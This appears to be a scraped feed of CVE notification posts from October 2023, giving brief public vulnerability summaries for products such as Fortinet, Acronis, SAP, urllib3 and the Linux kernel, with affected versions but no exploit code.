🚨 CVE-2023-41841An improper authorization vulnerability in Fortinet FortiOS 7.0.0 - 7.0.11 and 7.2.0 - 7.2.4 allows an attacker belonging to the prof-admin profile to perform elevated actions.🎖@cveNotify |
|
| 2023-10-10 18:52:15 |
🚨 CVE-2023-42782A insufficient verification of data authenticity vulnerability [CWE-345] in FortiAnalyzer version 7.4.0 and below 7.2.3 allows a remote unauthenticated attacker to send messages to the syslog server of FortiAnalyzer via the knoweldge of an authorized device serial number.🎖@cveNotify |
|
| 2023-10-10 18:52:14 |
🚨 CVE-2023-42787A client-side enforcement of server-side security [CWE-602] vulnerability in Fortinet FortiManager version 7.4.0 and before 7.2.3 and FortiAnalyzer version 7.4.0 and before 7.2.3 may allow a remote attacker with low privileges to access a privileged web console via client side code execution.🎖@cveNotify |
|
| 2023-10-10 18:52:13 |
🚨 CVE-2023-42788An improper neutralization of special elements used in an os command ('OS Command Injection') vulnerability [CWE-78] in FortiManager & FortiAnalyzer version 7.4.0, version 7.2.0 through 7.2.3, version 7.0.0 through 7.0.8, version 6.4.0 through 6.4.12 and version 6.2.0 through 6.2.11 may allow a local attacker with low privileges to execute unauthorized code via specifically crafted arguments to a CLI command🎖@cveNotify |
|
| 2023-10-10 18:52:11 |
🚨 CVE-2023-44249An authorization bypass through user-controlled key [CWE-639] vulnerability in Fortinet FortiManager version 7.4.0 and before 7.2.3 and FortiAnalyzer version 7.4.0 and before 7.2.3 allows a remote attacker with low privileges to read sensitive information via crafted HTTP requests.🎖@cveNotify |
|
| 2023-10-10 18:52:09 |
🚨 CVE-2023-44399ZITADEL provides identity infrastructure. In versions 2.37.2 and prior, ZITADEL administrators can enable a setting called "Ignoring unknown usernames" which helps mitigate attacks that try to guess/enumerate usernames. While this settings was properly working during the authentication process it did not work correctly on the password reset flow. This meant that even if this feature was active that an attacker could use the password reset function to verify if an account exist within ZITADEL. This bug has been patched in versions 2.37.3 and 2.38.0. No known workarounds are available.🎖@cveNotify |
|
| 2023-10-10 18:52:08 |
🚨 CVE-2023-5495A vulnerability was found in QDocs Smart School 6.4.1. It has been classified as critical. This affects an unknown part of the file /course/filterRecords/ of the component HTTP POST Request Handler. The manipulation of the argument searchdata[0][title]/searchdata[0][searchfield]/searchdata[0][searchvalue] leads to sql injection. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-241647. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-10-10 18:52:07 |
🚨 CVE-2023-5496A vulnerability was found in Translator PoqDev Add-On 1.0.11 on Firefox. It has been rated as problematic. This issue affects some unknown processing of the component Select Text Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-241649 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-10-10 18:52:05 |
🚨 CVE-2020-27634In Contiki 4.5, TCP ISNs are improperly random.🎖@cveNotify |
|
| 2023-10-10 18:52:04 |
🚨 CVE-2020-27213An issue was discovered in Ethernut Nut/OS 5.1. The code that generates Initial Sequence Numbers (ISNs) for TCP connections derives the ISN from an insufficiently random source. As a result, an attacker may be able to determine the ISN of current and future TCP connections and either hijack existing ones or spoof future ones. While the ISN generator seems to adhere to RFC 793 (where a global 32-bit counter is incremented roughly every 4 microseconds), proper ISN generation should aim to follow at least the specifications outlined in RFC 6528.🎖@cveNotify |
|
| 2023-10-10 18:52:03 |
🚨 CVE-2020-27630In Silicon Labs uC/TCP-IP 3.6.0, TCP ISNs are improperly random.🎖@cveNotify |
|
| 2023-10-10 18:52:02 |
🚨 CVE-2020-27631In Oryx CycloneTCP 1.9.6, TCP ISNs are improperly random.🎖@cveNotify |
|
| 2023-10-10 18:52:00 |
🚨 CVE-2020-27633In FNET 4.6.3, TCP ISNs are improperly random.🎖@cveNotify |
|
| 2023-10-10 18:51:59 |
🚨 CVE-2022-22298A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiIsolator version 1.0.0, FortiIsolator version 1.1.0, FortiIsolator version 1.2.0 through 1.2.2, FortiIsolator version 2.0.0 through 2.0.1, FortiIsolator version 2.1.0 through 2.1.2, FortiIsolator version 2.2.0, FortiIsolator version 2.3.0 through 2.3.4 allows attacker to execute arbitrary OS commands in the underlying shell via specially crafted input parameters.🎖@cveNotify |
|
| 2023-10-10 18:51:58 |
🚨 CVE-2020-27636In Microchip MPLAB Net 3.6.1, TCP ISNs are improperly random.🎖@cveNotify |
|
| 2023-10-10 18:51:57 |
🚨 CVE-2023-25604An insertion of sensitive information into log file vulnerability in Fortinet FortiGuest 1.0.0 allows a local attacker to access plaintext passwords in the RADIUS logs.🎖@cveNotify |
|
| 2023-10-10 16:52:09 |
🚨 CVE-2023-5370On CPU 0 the check for the SMCCC workaround is called before SMCCC support has been initialized. This resulted in no speculative execution workarounds being installed on CPU 0.🎖@cveNotify |
|
| 2023-10-10 16:52:08 |
🚨 CVE-2023-44212Sensitive information disclosure and manipulation due to missing authorization. The following products are affected: Acronis Agent (Linux, macOS, Windows) before build 31477.🎖@cveNotify |
|
| 2023-10-10 16:52:07 |
🚨 CVE-2023-44213Sensitive information disclosure due to excessive collection of system information. The following products are affected: Acronis Agent (Windows) before build 35739.🎖@cveNotify |
|
| 2023-10-10 16:52:05 |
🚨 CVE-2023-44214Sensitive information disclosure due to missing authorization. The following products are affected: Acronis Agent (Linux, macOS, Windows) before build 35739.🎖@cveNotify |
|
| 2023-10-10 16:52:04 |
🚨 CVE-2023-45240Sensitive information disclosure due to missing authorization. The following products are affected: Acronis Agent (Linux, macOS, Windows) before build 35739.🎖@cveNotify |
|
| 2023-10-10 16:52:03 |
🚨 CVE-2023-45241Sensitive information leak through log files. The following products are affected: Acronis Agent (Linux, macOS, Windows) before build 35739.🎖@cveNotify |
|
| 2023-10-10 16:52:02 |
🚨 CVE-2023-45242Sensitive information disclosure due to missing authorization. The following products are affected: Acronis Agent (Linux, macOS, Windows) before build 35739.🎖@cveNotify |
|
| 2023-10-10 16:52:01 |
🚨 CVE-2023-45243Sensitive information disclosure due to missing authorization. The following products are affected: Acronis Agent (Linux, macOS, Windows) before build 35739.🎖@cveNotify |
|
| 2023-10-10 13:21:57 |
🚨 CVE-2023-4837** UNSUPPPORTED WHEN ASSIGNED ** SmodBIP is vulnerable to Cross-Site Request Forgery, that could be used to induce logged in users to perform unintended actions, including creation of additional accounts with administrative privileges. This issue affects all versions of SmodBIP. SmodBIP is no longer maintained and the vulnerability will not be fixed.🎖@cveNotify |
|
| 2023-10-10 05:22:41 |
🚨 CVE-2023-42189Insecure Permissions vulnerability in Connectivity Standards Alliance Matter Official SDK v.1.1.0.0 , Nanoleaf Light strip v.3.5.10, Govee LED Strip v.3.00.42, switchBot Hub2 v.1.0-0.8, Phillips hue hub v.1.59.1959097030, and yeelight smart lamp v.1.12.69 allows a remote attacker to cause a denial of service via a crafted script to the KeySetRemove function.🎖@cveNotify |
|
| 2023-10-10 05:22:39 |
🚨 CVE-2023-44826Cross Site Scripting vulnerability in ZenTaoPMS v.18.6 allows a local attacker to obtain sensitive information via a crafted script.🎖@cveNotify |
|
| 2023-10-10 05:22:38 |
🚨 CVE-2023-44827An issue in ZenTao Community Edition v.18.6 and before, ZenTao Biz v.8.6 and before, ZenTao Max v.4.7 and before allows an attacker to execute arbitrary code via a crafted script to the Office Conversion Settings function.🎖@cveNotify |
|
| 2023-10-10 05:22:37 |
🚨 CVE-2023-44959An issue found in D-Link DSL-3782 v.1.03 and before allows remote authenticated users to execute arbitrary code as root via the Router IP Address fields of the network settings page.🎖@cveNotify |
|
| 2023-10-10 05:22:36 |
🚨 CVE-2023-5346Type confusion in V8 in Google Chrome prior to 117.0.5938.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-10-10 05:22:35 |
🚨 CVE-2023-42754A NULL pointer dereference flaw was found in the Linux kernel ipv4 stack. The socket buffer (skb) was assumed to be associated with a device before calling __ip_options_compile, which is not always the case if the skb is re-routed by ipvs. This issue may allow a local user with CAP_NET_ADMIN privileges to crash the system.🎖@cveNotify |
|
| 2023-10-10 05:22:34 |
🚨 CVE-2023-5345A use-after-free vulnerability in the Linux kernel's fs/smb/client component can be exploited to achieve local privilege escalation.In case of an error in smb3_fs_context_parse_param, ctx->password was freed but the field was not set to NULL which could lead to double free.We recommend upgrading past commit e6e43b8aa7cd3c3af686caf0c2e11819a886d705.🎖@cveNotify |
|
| 2023-10-10 05:22:32 |
🚨 CVE-2023-42756A flaw was found in the Netfilter subsystem of the Linux kernel. A race condition between IPSET_CMD_ADD and IPSET_CMD_SWAP can lead to a kernel panic due to the invocation of `__ip_set_put` on a wrong `set`. This issue may allow a local user to crash the system.🎖@cveNotify |
|
| 2023-10-10 05:22:31 |
🚨 CVE-2023-40310SAP PowerDesigner Client - version 16.7, does not sufficiently validate BPMN2 XML document imported from an untrusted source. As a result, URLs of external entities in BPMN2 file, although not used, would be accessed during import. A successful attack could impact availability of SAP PowerDesigner Client.🎖@cveNotify |
|
| 2023-10-10 05:22:30 |
🚨 CVE-2023-41365SAP Business One (B1i) - version 10.0, allows an authorized attacker to retrieve the details stack trace of the fault message to conduct the XXE injection, which will lead to information disclosure. After successful exploitation, an attacker can cause limited impact on the confidentiality and no impact to the integrity and availability.🎖@cveNotify |
|
| 2023-10-10 05:22:29 |
🚨 CVE-2023-42473S/4HANA Manage (Withholding Tax Items) - version 106, does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges which has low impact on the confidentiality and integrity of the application.🎖@cveNotify |
|
| 2023-10-10 05:22:27 |
🚨 CVE-2023-42474SAP BusinessObjects Web Intelligence - version 420, has a URL with parameter that could be vulnerable to XSS attack. The attacker could send a malicious link to a user that would possibly allow an attacker to retrieve the sensitive information.🎖@cveNotify |
|
| 2023-10-10 05:22:26 |
🚨 CVE-2023-42475The Statutory Reporting application has a vulnerable file storage location, potentially enabling low privileged attacker to read server files with minimal impact on confidentiality.🎖@cveNotify |
|
| 2023-10-10 05:22:24 |
🚨 CVE-2023-42477SAP NetWeaver AS Java (GRMG Heartbeat application) - version 7.50, allows an attacker to send a crafted request from a vulnerable web application, causing limited impact on confidentiality and integrity of the application.🎖@cveNotify |
|
| 2023-10-10 05:22:23 |
🚨 CVE-2023-44846An issue in SeaCMS v.12.8 allows an attacker to execute arbitrary code via the admin_ notify.php component.🎖@cveNotify |
|
| 2023-10-10 05:22:22 |
🚨 CVE-2023-44847An issue in SeaCMS v.12.8 allows an attacker to execute arbitrary code via the admin_ Weixin.php component.🎖@cveNotify |
|
| 2023-10-10 05:22:20 |
🚨 CVE-2023-44848An issue in SeaCMS v.12.8 allows an attacker to execute arbitrary code via the admin_template.php component.🎖@cveNotify |
|
| 2023-10-10 05:22:19 |
🚨 CVE-2023-5471A vulnerability, which was classified as critical, was found in codeprojects Farmacia 1.0. Affected is an unknown function of the file index.php. The manipulation of the argument usario/senha leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-241608.🎖@cveNotify |
|
| 2023-10-10 05:22:18 |
🚨 CVE-2023-45239A lack of input validation exists in tac_plus prior to commit 4fdf178 which, when pre or post auth commands are enabled, allows an attacker who can control the username, rem-addr, or NAC address sent to tac_plus to inject shell commands and gain remote code execution on the tac_plus server.🎖@cveNotify |
|
| 2023-10-10 05:22:16 |
🚨 CVE-2022-41352An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavis via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). Once pax is installed, amavis automatically prefers it over cpio.🎖@cveNotify |
|
| 2023-10-10 01:22:00 |
🚨 CVE-2023-43641libcue provides an API for parsing and extracting data from CUE sheets. Versions 2.2.1 and prior are vulnerable to out-of-bounds array access. A user of the GNOME desktop environment can be exploited by downloading a cue sheet from a malicious webpage. Because the file is saved to `~/Downloads`, it is then automatically scanned by tracker-miners. And because it has a .cue filename extension, tracker-miners use libcue to parse the file. The file exploits the vulnerability in libcue to gain code execution.🎖@cveNotify |
|
| 2023-10-10 01:21:58 |
🚨 CVE-2023-43899hansun CMS v1.0 was discovered to contain a SQL injection vulnerability via the component /ajax/ajax_login.ashx.🎖@cveNotify |
|
| 2023-10-10 01:21:57 |
🚨 CVE-2023-5463A vulnerability was found in XINJE XDPPro up to 3.7.17a. It has been rated as critical. Affected by this issue is some unknown functionality in the library cfgmgr32.dll. The manipulation leads to uncontrolled search path. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. VDB-241586 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-10-09 18:22:00 |
🚨 CVE-2019-5638Rapid7 Nexpose versions 6.5.50 and prior suffer from insufficient session expiration when an administrator performs a security relevant edit on an existing, logged on user. For example, if a user's password is changed by an administrator due to an otherwise unrelated credential leak, that user account's current session is still valid after the password change, potentially allowing the attacker who originally compromised the credential to remain logged in and able to cause further damage.🎖@cveNotify |
|
| 2023-10-09 06:22:06 |
🚨 CVE-2023-45349Atos Unify OpenScape 4000 Assistant V10 R1 before V10 R1.34.7, 4000 Assistant V10 R1.42.0, 4000 Assistant V10 R0, 4000 Manager V10 R1 before V10 R1.34.7, 4000 Manager V10 R1.42.0, and 4000 Manager V10 R0 expose sensitive information that may allow lateral movement to the backup system via AShbr. This is also known as OSFOURK-23722.🎖@cveNotify |
|
| 2023-10-09 06:22:05 |
🚨 CVE-2023-45350Atos Unify OpenScape 4000 Manager V10 R1 before V10 R1.42.1 and 4000 Manager V10 R0 allow Privilege escalation that may lead to the ability of an authenticated attacker to run arbitrary code via AScm. This is also known as OSFOURK-24034.🎖@cveNotify |
|
| 2023-10-09 06:22:04 |
🚨 CVE-2023-45351Atos Unify OpenScape 4000 Assistant V10 R1 before V10 R1.42.1, 4000 Assistant V10 R0, 4000 Manager V10 R1 before V10 R1.42.1, and 4000 Manager V10 R0 allow Authenticated Command Injection via AShbr. This is also known as OSFOURK-24039.🎖@cveNotify |
|
| 2023-10-09 06:22:00 |
🚨 CVE-2023-45352Atos Unify OpenScape Common Management Portal V10 before V10 R4.17.0 and V10 R5.1.0 allows an authenticated attacker to execute arbitrary code on the operating system via a Common Management Portal web interface Path traversal vulnerability allowing write access outside the intended folders. This is also known as OCMP-6592.🎖@cveNotify |
|
| 2023-10-09 06:21:59 |
🚨 CVE-2023-45353Atos Unify OpenScape Common Management Portal V10 before V10 R4.17.0 and V10 R5.1.0 allows an authenticated attacker to execute arbitrary code on the operating system by leveraging the Common Management Portal web interface for Authenticated remote upload and creation of arbitrary files affecting the underlying operating system. This is also known as OCMP-6591.🎖@cveNotify |
|
| 2023-10-09 06:21:58 |
🚨 CVE-2023-45354Atos Unify OpenScape Common Management Portal V10 before V10 R4.17.0 and V10 R5.1.0 allows an authenticated remote attacker to execute arbitrary code on the operating system by using the Common Management Portal web interface. This is also known as OCMP-6589.🎖@cveNotify |
|
| 2023-10-09 06:21:57 |
🚨 CVE-2023-45355Atos Unify OpenScape 4000 Platform V10 R1 before Hotfix V10 R1.42.2 and 4000 and Manager Platform V10 R1 before Hotfix V10 R1.42.2 allow command injection by an authenticated attacker into the platform operating system, leading to administrative access via the webservice. This is also known as OSFOURK-24120.🎖@cveNotify |
|
| 2023-10-09 06:21:56 |
🚨 CVE-2023-45356Atos Unify OpenScape 4000 Platform V10 R1 before Hotfix V10 R1.42.2 4000 and Manager Platform V10 R1 before Hotfix V10 R1.42.2 allow command injection by an authenticated attacker into the platform operating system, leading to administrative access, via dtb pages of the platform portal. This is also known as OSFOURK-23719.🎖@cveNotify |
|
| 2023-10-08 21:21:57 |
🚨 CVE-2023-44469A Server-Side Request Forgery issue in the OpenID Connect Issuer in LemonLDAP::NG before 2.17.1 allows authenticated remote attackers to send GET requests to arbitrary URLs through the request_uri authorization parameter. This is similar to CVE-2020-10770.🎖@cveNotify |
|
| 2023-10-08 16:52:05 |
🚨 CVE-2023-43804urllib3 is a user-friendly HTTP client library for Python. urllib3 doesn't treat the `Cookie` HTTP header special or provide any helpers for managing cookies over HTTP, that is the responsibility of the user. However, it is possible for a user to specify a `Cookie` header and unknowingly leak information via HTTP redirects to a different origin if that user doesn't disable redirects explicitly. This issue has been patched in urllib3 version 1.26.17 or 2.0.5.🎖@cveNotify |
|
| 2023-10-08 16:52:04 |
🚨 CVE-2023-40303GNU inetutils through 2.4 may allow privilege escalation because of unchecked return values of set*id() family functions in ftpd, rcp, rlogin, rsh, rshd, and uucpd. This is, for example, relevant if the setuid system call fails when a process is trying to drop privileges before letting an ordinary user control the activities of the process.🎖@cveNotify |
|
| 2023-10-08 16:52:03 |
🚨 CVE-2019-11324The urllib3 library before 1.24.2 for Python mishandles certain cases where the desired set of CA certificates is different from the OS store of CA certificates, which results in SSL connections succeeding in situations where a verification failure is the correct outcome. This is related to use of the ssl_context, ca_certs, or ca_certs_dir argument.🎖@cveNotify |
|
| 2023-10-08 16:52:01 |
🚨 CVE-2019-11236In the urllib3 library through 1.24.1 for Python, CRLF injection is possible if the attacker controls the request parameter.🎖@cveNotify |
|
| 2023-10-08 16:52:00 |
🚨 CVE-2019-0053Insufficient validation of environment variables in the telnet client supplied in Junos OS can lead to stack-based buffer overflows, which can be exploited to bypass veriexec restrictions on Junos OS. A stack-based overflow is present in the handling of environment variables when connecting via the telnet client to remote telnet servers. This issue only affects the telnet client — accessible from the CLI or shell — in Junos OS. Inbound telnet services are not affected by this issue. This issue affects: Juniper Networks Junos OS: 12.3 versions prior to 12.3R12-S13; 12.3X48 versions prior to 12.3X48-D80; 14.1X53 versions prior to 14.1X53-D130, 14.1X53-D49; 15.1 versions prior to 15.1F6-S12, 15.1R7-S4; 15.1X49 versions prior to 15.1X49-D170; 15.1X53 versions prior to 15.1X53-D237, 15.1X53-D496, 15.1X53-D591, 15.1X53-D69; 16.1 versions prior to 16.1R3-S11, 16.1R7-S4; 16.2 versions prior to 16.2R2-S9; 17.1 versions prior to 17.1R3; 17.2 versions prior to 17.2R1-S8, 17.2R2-S7, 17.2R3-S1; 17.3 versions prior to 17.3R3-S4; 17.4 versions prior to 17.4R1-S6, 17.4R2-S3, 17.4R3; 18.1 versions prior to 18.1R2-S4, 18.1R3-S3; 18.2 versions prior to 18.2R1-S5, 18.2R2-S2, 18.2R3; 18.2X75 versions prior to 18.2X75-D40; 18.3 versions prior to 18.3R1-S3, 18.3R2; 18.4 versions prior to 18.4R1-S2, 18.4R2.🎖@cveNotify |
|
| 2023-10-08 16:51:59 |
🚨 CVE-2020-26137urllib3 before 1.25.9 allows CRLF injection if the attacker controls the HTTP request method, as demonstrated by inserting CR and LF control characters in the first argument of putrequest(). NOTE: this is similar to CVE-2020-26116.🎖@cveNotify |
|
| 2023-10-08 05:52:22 |
🚨 CVE-2023-40648In Messaging, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-10-08 05:52:20 |
🚨 CVE-2023-40649In Messaging, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-10-08 05:52:19 |
🚨 CVE-2023-40650In Telecom service, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-10-08 05:52:18 |
🚨 CVE-2023-40651In urild service, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed🎖@cveNotify |
|
| 2023-10-08 05:52:16 |
🚨 CVE-2023-40652In jpg driver, there is a possible out of bounds write due to improper input validation. This could lead to local denial of service with System execution privileges needed🎖@cveNotify |
|
| 2023-10-08 05:52:15 |
🚨 CVE-2023-40653In FW-PackageManager, there is a possible missing permission check. This could lead to local escalation of privilege with System execution privileges needed🎖@cveNotify |
|
| 2023-10-08 05:52:13 |
🚨 CVE-2023-40654In FW-PackageManager, there is a possible missing permission check. This could lead to local escalation of privilege with System execution privileges needed🎖@cveNotify |
|
| 2023-10-08 05:52:12 |
🚨 CVE-2023-40631In Dialer, there is a possible missing permission check. This could lead to local information disclosure with System execution privileges needed🎖@cveNotify |
|
| 2023-10-08 05:52:11 |
🚨 CVE-2023-40632In jpg driver, there is a possible use after free due to a logic error. This could lead to remote information disclosure no additional execution privileges needed🎖@cveNotify |
|
| 2023-10-08 05:52:09 |
🚨 CVE-2023-40633In phasecheckserver, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-10-08 05:52:08 |
🚨 CVE-2023-40634In phasechecksercer, there is a possible missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed🎖@cveNotify |
|
| 2023-10-08 05:52:07 |
🚨 CVE-2023-40636In telecom service, there is a possible way to write permission usage records of an app due to a missing permission check. This could lead to local information disclosure with System execution privileges needed🎖@cveNotify |
|
| 2023-10-08 05:52:06 |
🚨 CVE-2023-40637In telecom service, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges🎖@cveNotify |
|
| 2023-10-08 05:52:04 |
🚨 CVE-2023-40638In Telecom service, there is a possible missing permission check. This could lead to local denial of service with System execution privileges needed🎖@cveNotify |
|
| 2023-10-08 05:52:03 |
🚨 CVE-2023-40639In SoundRecorder service, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges🎖@cveNotify |
|
| 2023-10-08 05:52:02 |
🚨 CVE-2023-40640In SoundRecorder service, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges🎖@cveNotify |
|
| 2023-10-08 05:52:00 |
🚨 CVE-2023-40642In Messaging, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-10-08 05:51:59 |
🚨 CVE-2023-40644In Messaging, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-10-08 05:51:58 |
🚨 CVE-2023-40643In Messaging, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-10-08 05:51:57 |
🚨 CVE-2023-40647In Messaging, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-10-07 05:52:24 |
🚨 CVE-2023-43981Presto Changeo testsitecreator up to 1.1.1 was discovered to contain a deserialization vulnerability via the component delete_excluded_folder.php.🎖@cveNotify |
|
| 2023-10-07 05:52:22 |
🚨 CVE-2023-43983Presto Changeo attributegrid up to 2.0.3 was discovered to contain a SQL injection vulnerability via the component disable_json.php.🎖@cveNotify |
|
| 2023-10-07 05:52:21 |
🚨 CVE-2023-44024SQL injection vulnerability in KnowBand Module One Page Checkout, Social Login & Mailchimp (supercheckout) v.8.0.3 and before allows a remote attacker to execute arbitrary code via a crafted request to the updateCheckoutBehaviour function in the supercheckout.php component.🎖@cveNotify |
|
| 2023-10-07 05:52:20 |
🚨 CVE-2023-43343Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Files - Description parameter in the Pages Menu component.🎖@cveNotify |
|
| 2023-10-07 05:52:19 |
🚨 CVE-2023-43615Mbed TLS 2.x before 2.28.5 and 3.x before 3.5.0 has a Buffer Overflow.🎖@cveNotify |
|
| 2023-10-07 00:52:19 |
🚨 CVE-2023-44061File Upload vulnerability in Simple and Nice Shopping Cart Script v.1.0 allows a remote attacker to execute arbitrary code via the upload function in the edit profile component.🎖@cveNotify |
|
| 2023-10-07 00:52:18 |
🚨 CVE-2023-44860An issue in NETIS SYSTEMS N3Mv2 v.1.0.1.865 allows a remote attacker to cause a denial of service via the authorization component in the HTTP request.🎖@cveNotify |
|
| 2023-10-07 00:52:17 |
🚨 CVE-2023-36618Atos Unify OpenScape Session Border Controller through V10 R3.01.03 allows execution of OS commands as root user by low-privileged authenticated users.🎖@cveNotify |
|
| 2023-10-07 00:52:15 |
🚨 CVE-2023-36619Atos Unify OpenScape Session Border Controller through V10 R3.01.03 allows execution of administrative scripts by unauthenticated users.🎖@cveNotify |
|
| 2023-10-07 00:52:14 |
🚨 CVE-2023-44075Cross Site Scripting vulnerability in Small CRM in PHP v.3.0 allows a remote attacker to execute arbitrary code via a crafted payload to the Address parameter.🎖@cveNotify |
|
| 2023-10-07 00:52:13 |
🚨 CVE-2023-44209Local privilege escalation due to improper soft link handling. The following products are affected: Acronis Agent (Linux, macOS, Windows) before build 29051.🎖@cveNotify |
|
| 2023-10-07 00:52:12 |
🚨 CVE-2023-44210Sensitive information disclosure and manipulation due to missing authorization. The following products are affected: Acronis Agent (Linux, macOS, Windows) before build 29258.🎖@cveNotify |
|
| 2023-10-07 00:52:10 |
🚨 CVE-2023-38703PJSIP is a free and open source multimedia communication library written in C with high level API in C, C++, Java, C#, and Python languages. SRTP is a higher level media transport which is stacked upon a lower level media transport such as UDP and ICE. Currently a higher level transport is not synchronized with its lower level transport that may introduce use-after-free issue. This vulnerability affects applications that have SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media transport other than UDP. This vulnerability’s impact may range from unexpected application termination to control flow hijack/memory corruption. The patch is available as a commit in the master branch.🎖@cveNotify |
|
| 2023-10-07 00:52:09 |
🚨 CVE-2023-43284An issue in D-Link Wireless MU-MIMO Gigabit AC1200 Router DIR-846 firmware version 100A53DBR-Retail allows a remote attacker to execute arbitrary code.🎖@cveNotify |
|
| 2023-10-07 00:52:08 |
🚨 CVE-2023-39191An improper input validation flaw was found in the eBPF subsystem in the Linux kernel. The issue occurs due to a lack of proper validation of dynamic pointers within user-supplied eBPF programs prior to executing them. This may allow an attacker with CAP_BPF privileges to escalate privileges and execute arbitrary code in the context of the kernel.🎖@cveNotify |
|
| 2023-10-07 00:52:06 |
🚨 CVE-2023-40684IBM Content Navigator 3.0.11, 3.0.13, and 3.0.14 with IBM Daeja ViewOne Virtual is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 264019.🎖@cveNotify |
|
| 2023-10-07 00:52:05 |
🚨 CVE-2023-1832An improper access control flaw was found in Candlepin. An attacker can create data scoped under another customer/tenant, which can result in loss of confidentiality and availability for the affected customer/tenant.🎖@cveNotify |
|
| 2023-10-07 00:52:04 |
🚨 CVE-2022-33160IBM Security Directory Suite 8.0.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 228568.🎖@cveNotify |
|
| 2023-10-07 00:52:03 |
🚨 CVE-2023-45322** DISPUTED ** libxml2 through 2.11.5 has a use-after-free that can only occur after a certain memory allocation fails. This occurs in xmlUnlinkNode in tree.c. NOTE: the vendor's position is "I don't think these issues are critical enough to warrant a CVE ID ... because an attacker typically can't control when memory allocations fail."🎖@cveNotify |
|
| 2023-10-07 00:52:02 |
🚨 CVE-2023-5452Cross-site Scripting (XSS) - Stored in GitHub repository snipe/snipe-it prior to v6.2.2.🎖@cveNotify |
|
| 2023-10-06 22:51:57 |
🚨 CVE-2023-5452Cross-site Scripting (XSS) - Stored in GitHub repository snipe/snipe-it prior to v6.2.2.🎖@cveNotify |
|
| 2023-10-06 19:22:24 |
🚨 CVE-2023-4401Dell SmartFabric Storage Software v1.4 (and earlier) contains an OS Command Injection Vulnerability in the CLI use of the ‘more’ command. A local or remote authenticated attacker could potentially exploit this vulnerability, leading to the ability to gain root-level access.🎖@cveNotify |
|
| 2023-10-06 19:22:23 |
🚨 CVE-2006-0459flex.skl in Will Estes and John Millaway Fast Lexical Analyzer Generator (flex) before 2.5.33 does not allocate enough memory for grammars containing (1) REJECT statements or (2) trailing context rules, which causes flex to generate code that contains a buffer overflow that might allow context-dependent attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-10-06 19:22:21 |
🚨 CVE-2023-26782An issue discovered in mccms 2.6.1 allows remote attackers to cause a denial of service via Backend management interface ->System Configuration->Cache Configuration->Cache security characters.🎖@cveNotify |
|
| 2023-10-06 19:22:20 |
🚨 CVE-2023-23365A path traversal vulnerability has been reported to affect Music Station. If exploited, the vulnerability could allow authenticated users to read the contents of unexpected files and expose sensitive data via a network.We have already fixed the vulnerability in the following version:Music Station 5.3.22 and later🎖@cveNotify |
|
| 2023-10-06 19:22:18 |
🚨 CVE-2023-23366A path traversal vulnerability has been reported to affect Music Station. If exploited, the vulnerability could allow authenticated users to read the contents of unexpected files and expose sensitive data via a network.We have already fixed the vulnerability in the following version:Music Station 5.3.22 and later🎖@cveNotify |
|
| 2023-10-06 19:22:17 |
🚨 CVE-2023-23370An insufficiently protected credentials vulnerability has been reported to affect QVPN Device Client. If exploited, the vulnerability could allow local authenticated administrators to gain access to user accounts and access sensitive data used by the user account via unspecified vectors.We have already fixed the vulnerability in the following version:QVPN Windows 2.1.0.0518 and later🎖@cveNotify |
|
| 2023-10-06 19:22:15 |
🚨 CVE-2023-23371A cleartext transmission of sensitive information vulnerability has been reported to affect QVPN Device Client. If exploited, the vulnerability could allow local authenticated administrators to read sensitive data via unspecified vectors.We have already fixed the vulnerability in the following version:QVPN Windows 2.2.0.0823 and later🎖@cveNotify |
|
| 2023-10-06 19:22:14 |
